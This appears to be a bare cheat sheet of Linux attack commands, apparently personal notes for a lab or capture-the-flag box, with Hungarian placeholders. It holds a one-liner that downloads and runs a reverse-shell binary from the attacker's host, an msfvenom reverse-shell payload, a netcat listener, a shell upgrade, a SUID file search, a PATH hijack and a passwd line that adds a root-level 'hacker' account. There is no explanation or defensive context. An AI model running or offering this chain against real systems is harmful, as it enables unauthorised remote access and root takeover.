"cd /tmp; rm -f /tmp/shell.elf; wget http://<saját ip>:8000/shell.elf; chmod 777 /tmp/shell.elf; /tmp/shell.elf;"

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<saját ip> LPORT=4444 -f elf > shell.elf

python3 -m http.server

nc -lvp 4444

python3 -c "import pty; pty.spawn('/bin/bash')"

find / -perm -u=s -type f 2>/dev/null

openssl passwd -5 "alma"

export PATH="/home/user/projekt:$PATH"
python3 te_programod.py

openssl passwd -5 "alma"

hacker:JELSZO:0:0::/root:/bin/bash

ssh <username>@<hostname>
